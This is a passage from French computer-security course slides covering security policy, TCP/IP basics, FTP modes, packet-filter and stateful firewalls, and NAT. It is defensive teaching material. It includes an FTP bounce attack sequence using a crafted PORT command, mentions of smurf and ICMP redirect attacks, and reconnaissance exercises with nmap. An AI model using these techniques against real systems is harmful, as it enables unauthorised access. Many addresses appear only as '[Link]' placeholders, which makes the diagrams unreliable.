[Link]@[Link] Sécurité Informatique/ November 28, 2021 123 / 506

Mais on a des instances pour nous protéger

[Link]@[Link] Sécurité Informatique/ November 28, 2021 124 / 506

Mais on a des instances pour nous protéger

[Link]@[Link] Sécurité Informatique/ November 28, 2021 125 / 506

Les services de contre-espionnage nous protègent

Le Sénat Américain demande des explications à la NSA lors de

l’affaire SolarWinds

[Link]@[Link] Sécurité Informatique/ November 28, 2021 126 / 506

M’en fous j’ai un VPN/mail anonymisateur de la mort qui
tue

[Link]@[Link] Sécurité Informatique/ November 28, 2021 127 / 506

M’en fous j’ai un VPN/mail anonymisateur de la mort qui
tue

ProtonMail : la loi c’est plus fort que toi

[Link]@[Link] Sécurité Informatique/ November 28, 2021 128 / 506

Ouais, mais les entreprises piratées n’ont rien sur moi

[Link]@[Link] Sécurité Informatique/ November 28, 2021 129 / 506

Ouais, mais les entreprises piratées n’ont rien sur moi

[Link]@[Link] Sécurité Informatique/ November 28, 2021 130 / 506

Ouais, mais on s’en fout c’est virtuel

Mon mot de passe de messagerie, je m’en fous. Tout ça c’est que

du virtuel.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 131 / 506

Les plus dangereuses fuites de données : Marriott

[Link]@[Link] Sécurité Informatique/ November 28, 2021 132 / 506

Les plus dangereuses fuites de données : police

[Link]@[Link] Sécurité Informatique/ November 28, 2021 133 / 506

Pourquoi dans le désert Irakien on voit ça ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 134 / 506

Et en France ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 135 / 506

Que du virtuel hein ?

Pour la petite histoire, l’information fut communiquée à la Chine

par les iraniens. Beaucoup de disparitions eurent lieu.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 136 / 506

Que du virtuel hein ?

Un mort à cause d’un ransomware dans un hopital Tentative

d’empoisonnement de l’eau à Oldsmar en Floride avec un autre
article

[Link]@[Link] Sécurité Informatique/ November 28, 2021 137 / 506

Heureusement

On peut repérer les pirates quand ils cherchent des failles.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 138 / 506

Shodan, Censys, Zoomeye etc.

[Link]
[Link]
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 139 / 506

Définir les rôles : politique de sécurité

Que voulez-vous faire ?

Qui fait quoi, comment et quand ?
Les pièges à éviter

[Link]@[Link] Sécurité Informatique/ November 28, 2021 140 / 506

Que voulez-vous faire ?

Protéger contre la CIA/NSA/GRU ?

Protéger contre des adversaires précis ?
Protéger contre l’interne ?
Protéger contre le "normal" ?
N’oubliez jamais
Vous voulez assurer la survie de votre organisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 141 / 506

Qui aura le droit de faire quoi ?

Politique de sécurité
Le web est autorisé pour qui, pour quoi ?
Qui peut utiliser la messagerie ?
Qui définit les règles ?
Qui les annonce et comment ?
Quelles sont les sanctions ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 142 / 506

Les pièges à éviter

Tenter l’impossible
Faire du tout sécuritaire

[Link]@[Link] Sécurité Informatique/ November 28, 2021 143 / 506

A l’impossible nul n’est tenu

Efficacité

100%

Coût :
●Financier,

0% ●Compétence,

●Désagréments

[Link]@[Link] Sécurité Informatique/ November 28, 2021 144 / 506

Eviter le tout sécuritaire

Fragilise votre soutien par la DG

Provoque des tentatives de contournements
Préférer empêcher à interdire

Rappel
Votre but est que "votre organisme fonctionne" pas de
concurrencer Fort Knox

[Link]@[Link] Sécurité Informatique/ November 28, 2021 145 / 506

Un exemple ?

"Le mot de passe doit faire 12 caractères avec 4 catégories"

La "meilleure" solution
C’est 20 caractères sans obligation,
ou 2 mots avec un espace pour 16 caractères.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 146 / 506

Les priorités

Empêcher les agressions (volontaires ou non) : Protection

Repérer les agressions: Détection
Confiner les agressions et limiter leurs conséquences
Accumuler les preuves
Comprendre, apprendre, retenir (itération)
Retour à la normale

[Link]@[Link] Sécurité Informatique/ November 28, 2021 147 / 506

La protection

Nous parlerons ici de la protection dite périmétrique

Partie la plus efficace
70% à 80% d’attaques en moins (les choses changent)
La moins coûteuse
en temps
en argent
en compétence
La plus stable dans le temps
La plus visible

[Link]@[Link] Sécurité Informatique/ November 28, 2021 148 / 506

La détection

La détection permet de réagir

Permet de prévoir l’avenir
scan sur des ports inconnus
analyse des comportement anormaux
Permet de justifier les coûts
En présentant correctement les informations

[Link]@[Link] Sécurité Informatique/ November 28, 2021 149 / 506

Confinement des agressions

"Réactif" en cas d’échec de protection

Protection en profondeur
Doit être placé "en plus" avant la détection (proactif)
De plus en plus utile avec les vers

[Link]@[Link] Sécurité Informatique/ November 28, 2021 150 / 506

Accumuler les preuves

Optionnel
En cas de recours en justice
A notre initiative
Mais aussi à notre encontre
Tâche ingrate et rarement effectuée
Réputation
Argent
Temps

[Link]@[Link] Sécurité Informatique/ November 28, 2021 151 / 506

Comprendre, apprendre, retenir

L’attaque a réussi
Pourquoi ?
Comment y remédier ?
Parer à la faille utilisée
Réfléchir à une généralisation de cette faille

[Link]@[Link] Sécurité Informatique/ November 28, 2021 152 / 506

Remise en état

Plan de reprise/Plan de secours

Si elle est faite avant de comprendre
Vous ne pourrez apprendre
Vous n’aurez donc rien appris
Vous resubirez l’attaque
Nécessité d’une machine à remonter le temps
Phase rarement testée

[Link]@[Link] Sécurité Informatique/ November 28, 2021 153 / 506

Collecte des informations : exercices

Exercice 1 : Ingénierie informationnelle

Collecter toute information utile pour attaquer le domaine
[Link]

Exercice 2 : jouons avec nmap

Découvrir les utilisations de NMAP, pour les ports, les applications,
les versions.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 154 / 506

Résolution des problèmes

La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure

[Link]@[Link] Sécurité Informatique/ November 28, 2021 155 / 506

La tronçonneuse

On enlève l’inutile :
Protection contre l’extérieur;
Protection contre l’intérieur;
Protection à l’intérieur.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 156 / 506

Protection contre l’extérieur

Travail effectué par le firewall :

On bloque tout ce qui vient de l’extérieur;
Hormis ce qui est spécifiquement autorisé;
Le tout basé sur une notion de port;
Les entrées sont limitées en rapidité;
On jette et on n’avertit pas.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 157 / 506

Protection contre l’intérieur

Tout est autorisé en sortie SAUF

Ce qui est offert en interne
DNS, SMTP, NTP, etc.
Ce qui est dangereux pour l’extérieur
SNMP, Netbios, etc.
Ce qui est illégal, non productif
P2P, pédopornographie
Jeux en ligne, pornographie
Les "zones ouvertes" qui doivent être contrôlées
Show Room
WiFi

[Link]@[Link] Sécurité Informatique/ November 28, 2021 158 / 506

Protection à l’intérieur

Travail effectué par un filtrage interne. Tout est autorisé en

intra-établissement SAUF
Ce qui est dangereux
Les zones ouvertes
Les zones fragiles doivent être injoignables

[Link]@[Link] Sécurité Informatique/ November 28, 2021 159 / 506

Le ciseau à bois

On enlève ce que l’on sait dangereux dans ce qui est autorisé

Le courrier électronique
Le Web
Les services en général

[Link]@[Link] Sécurité Informatique/ November 28, 2021 160 / 506

Le courrier électronique

Le SMTP rentre mais

Il ne rentre pas pour ressortir
Il ne doit pas être vecteur de virus
Il est analysé contre le spam (ou plutôt contre tout danger).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 161 / 506

Le Web

Le Web sort mais

Certains sites sont interdits
Les nids à virus sont inspectés
On journalise ce qui passe

[Link]@[Link] Sécurité Informatique/ November 28, 2021 162 / 506

Les services

Certains services sont offerts, mais

Les serveurs sont patchés
Ils remontent les anomalies
Un détecteur d’anomalies veille
On limite les conséquences des anomalies

[Link]@[Link] Sécurité Informatique/ November 28, 2021 163 / 506

Le reste

Le reste sort mais

Limitation des débits
On suit les connexions (journaux)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 164 / 506

Le papier de verre

On repère ce qui va être dangereux

[Link]@[Link] Sécurité Informatique/ November 28, 2021 165 / 506

Les logs sont nos amis

Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 166 / 506

Les actions de salubrité publique

On abat les webmestres !

[Link]@[Link] Sécurité Informatique/ November 28, 2021 167 / 506

La lazure

On évite que le temps et les intempéries ne nous détruisent la

maison.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 168 / 506

La machine à remonter le temps

On fait des sauvegardes

On vérifie qu’elles fonctionnent
On ne les place pas au même endroit que les serveurs
On vérifie qu’elles pourront toujours fonctionner

[Link]@[Link] Sécurité Informatique/ November 28, 2021 169 / 506

La dynamo

On met en place la dynamo

E.D.F. en temps de paix : 240 Volts
E.D.F. en temps de grève : 0 Volt
E.D.F. en temps d’orage : 400 Volts
L’onduleur est votre ami. Vous devez l’écouter.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 170 / 506

On ferme à clé

Coût d’un pirate professionnel: 2000 e à 200 000 e

Coût d’une femme de ménage : 100 e la journée
Moralité : fermez les portes.
Post scriptum
Temps moyen pour fracturer une serrure de sécurité "simple" : 3 à
30 secondes.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 171 / 506

Les protections réseau

[Link]@[Link] Sécurité Informatique/ November 28, 2021 172 / 506

Comment protéger ?

Dans un monde parfait

Bien concevoir les services
Bien configurer les services
Bien les utiliser
Dans le monde réel
Limiter les accès aux services nécessaires
En nombre de machines
En nombre de services
Limiter les conséquences d’une intrusion

[Link]@[Link] Sécurité Informatique/ November 28, 2021 173 / 506

Mais garder à l’esprit
Une protection périmétrique ne protège pas :
du WiFi
des portables infectés
des applications web infectées

[Link]@[Link] Sécurité Informatique/ November 28, 2021 174 / 506

D’où l’idée

Séparer les services publics et les services internes

Limiter la communication et la visibilité depuis l’extérieur
Obliger le passage par un point unique de contrôle => Le
pare-feu

[Link]@[Link] Sécurité Informatique/ November 28, 2021 175 / 506

Les pare-feux

De nombreux noms
Firewall
Garde-Barrières
Gatekeeper
Qu’est-ce que c’est ?
Comment ça marche ?
Evaluer et choisir un pare-feu

[Link]@[Link] Sécurité Informatique/ November 28, 2021 176 / 506

Les pare-feux

Définition réseaux
Types de pare-feux
Types d’architecture
Critères de choix
Perspectives

[Link]@[Link] Sécurité Informatique/ November 28, 2021 177 / 506

Politique de sécurité : le firewall

La sortie
Qui ?
Pour quoi ?
L’entrée
Qui ?
Pour quoi ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 178 / 506

Définitions

IP
ICMP
La notion de port
TCP
UDP
Protocoles

[Link]@[Link] Sécurité Informatique/ November 28, 2021 179 / 506

IP : Internet Protocol

Protocole de communication
Actuellement en version IPv4
IPv6 en cours de déploiement (Free depuis Décembre 2007)
Chaque machine sur Internet a une adresse IP unique
Les paquets se propagent de routeur en routeur
Protocole non fiable mais résistant

[Link]@[Link] Sécurité Informatique/ November 28, 2021 180 / 506

IP : Internet Protocol

Format d’une adresse

Classes (obsolète)
A : de [Link] à [Link]
B : de [Link] à [Link]
C : de [Link] à [Link]
D : de [Link] à [Link] (Multicast)
Notion de CIDR
Classless InterDomain Routing
Plus assez de classes C ou B disponibles
[Link]/24 ou [Link]/23

[Link]@[Link] Sécurité Informatique/ November 28, 2021 181 / 506

IP : Internet Protocol

Ensemble de diverses adresses non disponibles : RFC3330 (ex

RFC1918)
Adresses privées non routables sur Internet
[Link]/8
[Link]/16 à [Link]/16
[Link]/24 à [Link]/24
Adresses spécifiques
[Link]/8
[Link]/4
[Link]/24
[Link]/16
etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 182 / 506

IP : Internet Protocol

Longueur Type de service

Version en-tête (TOS) Longueur totale en octets

Identification de fragment flags 13-bit décalage fragment

20 octets
TTL Protocole Somme de Contrôle d ’en-tête

Adresse IP source

Adresse IP destination

Options éventuelles (timestamp, source routing, etc…) X fois

Données

32 bits en codage « big endian »

[Link]@[Link] Sécurité Informatique/ November 28, 2021 183 / 506

ICMP : Internet Control Message Protocol

Protocole de signalisation
Service/machine/réseau injoignable
Demande de ralentissement
Peut être utilisé pour les attaques
ICMP Redirect
ICMP Echo
Attaque smurf

[Link]@[Link] Sécurité Informatique/ November 28, 2021 184 / 506

TCP/UDP: La notion de port

Le port est un numéro de 0 à 65535

Lors d’une communication, le serveur et le client ont chacun
un port utilisé
Chaque machine associe une communication à un quadruplet
(IP-C/Port-C/IP-S/Port-S)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 185 / 506

TCP/UDP : La notion de port (2)

Dénomination
Port destination : port du destinataire
Port source : port de l’expéditeur (provenance du paquet)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 186 / 506

TCP/UDP : La notion de port (3)

Les ports sont définis par le IANA ([Link]

De 1 à 1023 : well known ports ( < et > 512)
TCP/23 : telnet
UDP/53 : DNS
de 1024 à 49151 : user (registered) ports
TCP/3128 : Squid
UDP/2049 : NFS
de 49152 à 65535 : dynamics or private ports

[Link]@[Link] Sécurité Informatique/ November 28, 2021 187 / 506

TCP/UDP : La notion de port (4)

Hormis cas exceptionnel, une communication a lieu entre un port

haut et un port bas
Port du serveur généralement < 1024, toujours < 49152
Port du client toujours supérieur à 1023, parfois >=49152

[Link]@[Link] Sécurité Informatique/ November 28, 2021 188 / 506

TCP/UDP : Schéma

Client Serveur
65535 65535
… …
49152 49152
49151 49151
… …
1024 1024
1023 1023
… …
1 1

[Link]@[Link] Sécurité Informatique/ November 28, 2021 189 / 506

TCP : Transport Control Protocol

Protocole connecté
Assure la cohérence de la connexion
A un début et une fin
Un "triple handshake" initialise la connexion
L’aléa du numéro de séquence n’est pas toujours bon
S’il est prévisible, on peut "simuler" une connexion

[Link]@[Link] Sécurité Informatique/ November 28, 2021 190 / 506

TCP : Schéma

Client Serveur
Choix du SYN (1000) Choix du
N° SEQ SYN (2000),ACK(1001) N° SEQ
ACK(2001)
Communication Etablie
Tout paquet possède un ACK

ACK (2300), FIN(1500)

ACK(1501)
ACK(1501),FIN(2300)
ACK(2301)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 191 / 506

UDP :User Datagram Protocol

Protocole non connecté

L’application se débrouille
En cas de désordre
En cas de perte de paquet
Plus rapide
Pas d’attente d’acquittement
Peut être utilisé pour du multicast

[Link]@[Link] Sécurité Informatique/ November 28, 2021 192 / 506

TCP : Schéma

HTTP, HTTP/2, DNS, HTTP/3, QUIC,

FTP, SMTP, etc. Visio conférence TFTP, SNMP, etc.

TCP (86%) UDP (12%)

ICMP (<1%)

Couche physique (ethernet, ppp, etc...)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 193 / 506

Protocoles applicatifs

Situés au dessus des couches TCP et UDP

Ils ont des ordres spécifiques à leur fonction
Souvent ce sont des ordres "lisibles"
SMTP (HELO, DATA, MAIL FROM, etc ...)
Plus ou moins complexes
Port unique fixe (http, smtp, pop, dns, ...)
Port(s) dynamique(s) (ftp, irc, h323, ...)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 194 / 506

Protocole simple : HTTP

Client : [Link] Serveur : [Link]

Aléa 1 Etablissement de la connexion

80
Aléa 1 GET [Link] HTTP/1.0\n\n
80
Aléa 1 <HTML><HEAD>..</HTML>
80
Aléa 1 Coupure de connexion
80

[Link]@[Link] Sécurité Informatique/ November 28, 2021 195 / 506

Protocole complexe FTP actif
Client : [Link] Serveur : [Link]

Aléa 1 Etablissement de la connexion 21

Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@[Link] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PORT 1,2,3,4,X,Y 21
Aléa 1 200 Port OK 21
X*256+Y Etablissement de la connexion 20
Aléa 1 GET fichier 21
X*256+Y données du fichier 20

[Link]@[Link] Sécurité Informatique/ November 28, 2021 196 / 506

Protocole complexe FTP actif (flux)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 197 / 506

Protocole complexe FTP passif

Client : [Link] Serveur : [Link]

Aléa 1 Etablissement de la connexion 21

Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@[Link] 21
Aléa 1 230 Guest Login OK 21
Aléa 1 PASV 21
Aléa 1 227 Passive 5,6,7,8,X,Y 21
Aléa 2 Etablissement de la connexion X*256+Y
Aléa 1 GET fichier 21
Aléa 2 données du fichier X*256+Y

[Link]@[Link] Sécurité Informatique/ November 28, 2021 198 / 506

Protocole complexe FTP passif (flux)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 199 / 506

Attaques protocolaires : FTP

Pirate Serveur FTP Serveur SMTP

[Link] [Link] "caché"
[Link]
Aléa 1 PORT 9,8,7,6,0,25 21 25
Aléa 1 200 Port OK 21 25
Aléa 1 20 25
Aléa 1 20 25

[Link]@[Link] Sécurité Informatique/ November 28, 2021 200 / 506

Les pare-feux

Les filtres de paquets

Les stateful
Les deep inspection
Les IPS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 201 / 506

Les pare-feux

Sont placés en "coupure" du réseau

Coupent la communication ou la laissent passer sans la
modifier
Ne nécessitent pas de configurer les machines ou les logiciels

[Link]@[Link] Sécurité Informatique/ November 28, 2021 202 / 506

Filtre de paquets : Définition

Décide du passage de chaque paquet sans le replacer dans le

contexte
Suivant les critères du paquet
Source,destination
Options IP,ICMP,UDP,TCP(ACK,SYN,etc ...)
Suivant des critères extérieurs (rares)
heure, charge, etc...

[Link]@[Link] Sécurité Informatique/ November 28, 2021 203 / 506

Formalisation

Source : machine qui envoie le paquet

C’est le début de la flèche (cf schéma)
Destination : machine à qui le paquet est envoyé.
C’est la pointe de la flèche.
Source/Destination notion différente de Client/Serveur
Inscrit dans l’en-tête IP des paquets.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 204 / 506

Filtre de paquets : Avantages

Le plus rapide, il peut même être placé sur

Des Network processeurs
Des FPGA
des ASICs
Le plus simple à installer
Très efficace pour des séparations de réseaux

[Link]@[Link] Sécurité Informatique/ November 28, 2021 205 / 506

Filtre de paquets : Inconvénients

Règles peu lisibles

Règles nombreuses ( plusieurs centaines)
Certains filtrages sont compliqués et imparfaits
FTP
RPC
Ne comprend pas du tout la connexion

[Link]@[Link] Sécurité Informatique/ November 28, 2021 206 / 506

Filtre de paquets : Trucs

Toujours définir une règle par défaut

elle existe toujours, mais il faut la définir
Optimisation de la vitesse :
règle de passage générale des paquets acquittés (75%)
Gestion des ICMP
(unreachable, etc ...) : ne pas les renvoyer
Définir les règles sur une autre machine

[Link]@[Link] Sécurité Informatique/ November 28, 2021 207 / 506

Filtre de paquets : Trucs 2

Préférer les noms de machines dans la conception des règles

Préférer les adresses IP dans les règles
Utiliser un générateur de règles
Evite les erreurs bêtes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 208 / 506

Filtre de paquets : Questions à poser

Ordre des règles :

Séquentiel
A précision décroissante
A branchement
Arrêt sur correspondance (on match) ?
Filtres entrée et sortie ?
Pare-feu auto-protégé
Filtre indépendant sur chaque interface ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 209 / 506

Filtre de paquets : Questions à poser.

Possibilité de mettre des filtres sur des options du paquet

Filtrage sur le port
Capacité de journalisation
Vitesse annoncée pour quelles conditions ? Quasiment
toujours pour
2 machines
1 seule règle (ACCEPT)
1 protocole simple
Gestion des Vlans

[Link]@[Link] Sécurité Informatique/ November 28, 2021 210 / 506

Filtrage séquentiel

Règle 1
Règle 2
Règle 3
Règle 4
Règle 5
Règle 6
Règle 7
Règle 8
Règle 9
Règle 10
Règle 11
Règle 12
Règle 13
Règle 14
Règle 15 Pas d ’arrêt sur correspondance

[Link]@[Link] Sécurité Informatique/ November 28, 2021 211 / 506

Filtrage par ordre de précision

Règle 1 Règle 2
Règle 2 Règle 4
Règle 3 Règle 6
Règle 4 Règle 7
Règle 5 Règle 5
Règle 6 Règle 3
Règle 7 Règle 1
[Link]/16 ==> [Link] PAS OK [Link]/24 ==> [Link] OK
[Link]/24 ==> [Link] OK [Link]/16 ==> [Link] PAS OK

[Link]@[Link] Sécurité Informatique/ November 28, 2021 212 / 506

Filtrage par branchement

Règle 1
Règle 2 Règle 2.1
Règle 2.2
Règle 2.3
Règle 2.4
Règle 3
Règle 4
Règle 5 Règle 5.1
Règle 5.2 Correspondance
Règle 5.3
Règle 6
Règle 7
Règle 8 Règle 8.1
Règle 8.2
Règle 8.3

[Link]@[Link] Sécurité Informatique/ November 28, 2021 213 / 506

Filtre de paquets : Options courantes

Limitation de débit
Eviter les abus internes
Limiter les rebonds de flooding
Journalisation
du refus
des paquets refusés

[Link]@[Link] Sécurité Informatique/ November 28, 2021 214 / 506

Filtre de paquets : Exemples

IOS cisco
Filtre commutateurs et routeurs
Iptables (mais peut faire mieux)
Pktfilter sur windows 2K/XP/2003
De manière générale : tout filtre accéléré par ASIC

[Link]@[Link] Sécurité Informatique/ November 28, 2021 215 / 506

Filtre de paquets : Les problèmes

Les virtualhost
Les VPS
Les CDN (Akamaï,Fastly, etc.)
qui à l’IP [Link] ?
[Link]
[Link]
CloudFlare
Super contre les DDoS
Les pirates l’ont bien compris.... ils l’utilisent.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 216 / 506

Filtre de paquets : Principe de Netfilter

Interface(s)
Interface(s)
FORWARD

User-defined
INPUT OUTPUT
User-defined

Processus

[Link]@[Link] Sécurité Informatique/ November 28, 2021 217 / 506

Filtre de paquets : exercices

Filtrage en entrée
Autorisez du ssh, puis du ftp passif et du ftp actif

Filtrage en sortie
Autorisez du ssh, puis du ftp actif et du ftp passif

[Link]@[Link] Sécurité Informatique/ November 28, 2021 218 / 506

Pare-feu stateful inspection

Pourquoi un pare-feu à gestion d’états

Pare-feu filtrant insuffisant
Trop grande ouverture de ports
Idée de conserver l’état de la connexion
Apparition de besoins de NAT

[Link]@[Link] Sécurité Informatique/ November 28, 2021 219 / 506

Pare-feu Stateful : Définition

Stateful, Stateful Inspection

Gère les différents états de la connexion (début,milieu,fin)
Ressemble au SYN, SYN-ACK, ACK de TCP. Mais pas tout à
fait
Fait de même avec UDP (Travaille sur les ports et le timeout)
Un critère de filtrage apparaît: l’état.
C’est la seule définition !
Recouvre plusieurs réalités

[Link]@[Link] Sécurité Informatique/ November 28, 2021 220 / 506

Pare-feu Stateful : TCP

Serveur IP-S
Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179

Paquet 1501 IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

[Link]@[Link] Sécurité Informatique/ November 28, 2021 221 / 506

Pare-feu Stateful : UDP

Client IP-C Serveur IP-S

Port-C Port-S Critère d ’état, Timeout
Paquet 1
IP-C:P-C / IP-S:P-S / NEW / 29
Paquet 2 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /
Paquet 3 IP-C:P-C / IP-S:P-S / ESTABLISHED / 29 /

Communication

Paquet 1500
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Paquet 1501
IP-C:P-C / IP-S:P-S / ESTABLISHED / 179
Rien pendant 300 sec
RIEN ==> Timeout
Paquet 1502
IP-C:P-C / IP-S:P-S / NEW / 29

[Link]@[Link] Sécurité Informatique/ November 28, 2021 222 / 506

Plus simplement

Le fils va dehors avec un seau d’eau => NEW

La fille cours après son frère, trempée => ESTABLISHED
Course poursuite => ESTABLISHED
Ils font la paix => FIN
L’un d’eux se casse la figure => RST
Ils arrêtent pendant 15 minutes => TIMEOUT

[Link]@[Link] Sécurité Informatique/ November 28, 2021 223 / 506

Pare-feu stateful : définition (2)

Les meilleurs stateful analysent le contenu (STIC)

Les filtres sont donc dynamiques
Rares sont les STIC qui font tous les protocoles
Certains n’analysent pas du tout le contenu (STI)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 224 / 506

Pare-feu Stateful : FTP

Client IP-c Serveur IP-S

Port-C port 21
SYN (1000)
IP-C:P-C / IP-S:21 / NEW / 29
SYN (2000),ACK(1001) IP-C:P-C / IP-S:21 / ESTABLISHED / 29
ACK(2001) IP-C:P-C / IP-S:21 / ESTABLISHED / 890

Communication Etablie

PORT, IP-C,P-C2
IP-C:P-C / IP-S:P-S / ESTABLISHED / 890
200 PORT OK
IP-C:P-C2 / IP-S:20 / RELATED / 890

[Link]@[Link] Sécurité Informatique/ November 28, 2021 225 / 506

Pare-feu Stateful : Avantages

Rapide (mais l’analyse du contenu ralentit légèrement)

Plus précis et donc plus efficace (STIC)
Règles plus simples (STIC)
Règles moins nombreuses (STIC)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 226 / 506

Pare-feu Stateful : Inconvénients

Attention, l’analyse de contenu n’est pas toujours présente

Ne comprend pas la communication
Tous les protocoles ne peuvent pas passer (X11)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 227 / 506

Pare-feu Stateful : Questions à poser

Idem filtre de paquets

STIC ou STI ?
Quels protocoles sont supportés ?
Ajout de nouveaux protocoles
Gestion des N° de séquence ?
Vitesse annoncée pour quelle protection ?
Attention aux optimisations sur le matériel

[Link]@[Link] Sécurité Informatique/ November 28, 2021 228 / 506

Pare-feu Stateful : Options courantes

Les mêmes qu’avec les filtres de paquets

Plugin vers des fonctions évoluées
Filtrage d’URL (STIC) par CVP
Lutte antivirale (STIC) par CVP
Plugin vers des relais applicatifs
Authentification sur certains protocoles
Le NAT
Le Tarpit

[Link]@[Link] Sécurité Informatique/ November 28, 2021 229 / 506

Pare-feu Stateful : Exemples

Checkpoint Firewall-1 (STIC)

Netfilter (IPTables) de Linux (STIC)
IOS Firewall de CISCO (STIC)
etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 230 / 506

Pare-feu Stateful : Le NAT

Network Address Translation

Modification de l’adresse visible d’une machine interne (IP-e
au lieu de IP-i)
Deux buts
Pallier à un manque d’adresses (utilisation des RFC3330)
Cacher pour protéger
De nombreuses manières de l’implémenter

[Link]@[Link] Sécurité Informatique/ November 28, 2021 231 / 506

Pare-feu Stateful : le NAT : le SNAT

Source Network Address Translation

On change l’adresse du client
C’est l’utilisation principale
Permet d’avoir un grand nombre d’adresses IP

[Link]@[Link] Sécurité Informatique/ November 28, 2021 232 / 506

Pare-feu Stateful : le NAT : le SNAT

Externe Interne
[Link]:80  [Link]:3456
[Link]:80  [Link]:3456

[Link]:80  [Link]:3456
[Link]:80  [Link]:3456
Client C1
Serveur S1

[Link]@[Link] Sécurité Informatique/ November 28, 2021 233 / 506

Pare-feu Stateful : le NAT : le DNAT

Destination Network Address Translation

Plus rarement utilisée
Pour des serveurs en DMZ
Pour des serveurs derrière une adresse unique
Permet un pseudo équilibrage de charge
Peut-être utilisé pour des processus de diversion

[Link]@[Link] Sécurité Informatique/ November 28, 2021 234 / 506

Pare-feu Stateful : le NAT : le DNAT

Externe Interne
[Link]:3456  [Link]:80
[Link]:3456  [Link]:80

[Link]:3456  [Link]:80
[Link]:3456  [Link]:80

Client C1 Serveur S1

[Link]@[Link] Sécurité Informatique/ November 28, 2021 235 / 506

Pare-feu Stateful : le NAT dynamique

L’adresse visible fait partie d’un pool

Généralement dans le cas d’un SNAT
Pool-e < Pool-i
La correspondance IP-e et IP-i est variable dans le temps (à la
DHCP)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 236 / 506

Pare-feu Stateful : le NAT dynamique

Externe Interne
[Link]:80  [Link]:3456
[Link]:80  [Link]:3456

[Link]:80  [Link]:3456
[Link]:80  [Link]:3456

Serveur S1 Client C1
[Link] :80  [Link]:6789
[Link]:80  [Link]:6789

[Link] :80  [Link]:6789

[Link] :80  [Link]: 6789

Serveur S2 Pare-feu Client C2

[Link]@[Link] Sécurité Informatique/ November 28, 2021 237 / 506

Pare-feu Stateful : le NAT : le SAT

Static Address Translation

La correspondance IP-e et IP-i est constante
Réservé à des serveurs accessibles : DNAT
Pour les clients si Pool-e = Pool-i

[Link]@[Link] Sécurité Informatique/ November 28, 2021 238 / 506

Pare-feu Stateful : le NAT : le PAT

PAT : Port Address translation

Correspond à la quasi totalité des NAT grand public
Dans le cas où Pool-e = 1
On est obligé de changer le port source pour différencier les
machines
Appelé aussi mascarade
Peut-être utilisé en complément des autres méthodes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 239 / 506

Pare-feu Stateful : le NAT : le PAT

Externe [Link]:80  [Link]:3456

Interne
[Link]:80  [Link].8001

[Link]:80  12.1.1 .3.8001

[Link]:80  [Link]:3456

Serveur S1 Client C1
[Link] :80  [Link]:6789
[Link]:80  [Link].8002

[Link] :80  [Link].8002

[Link] :80  [Link]: 6789

Serveur S2 Pare-feu Client C2

[Link]@[Link] Sécurité Informatique/ November 28, 2021 240 / 506

Pare-feu Stateful : le NAT : problème
Les mêmes que le Stateful : où se fait le changement ?
En-têtes IP, TCP et UDP (STI)

Externe Interne
[Link]:21  [Link]:8001 [Link]:21  [Link]:3456

CMD : « port 10,1,1,2,6789 » CMD : « port 10,1,1,2,6789 »

[Link]:20  10,1,1,2,6789

[Link]
!!!

[Link]@[Link] Sécurité Informatique/ November 28, 2021 241 / 506

Pare-feu Stateful : le NAT : solution
On ne se limite plus aux en-têtes
En-têtes IP, TCP et UDP (STI)
Et on ajoute :
Modification dans les messages

Externe Interne
[Link]:21  [Link]:8001 [Link]:21  [Link]:3456

CMD : « port 12,1,1,3,8002 » CMD : « port 10,1,1,2,6789 »

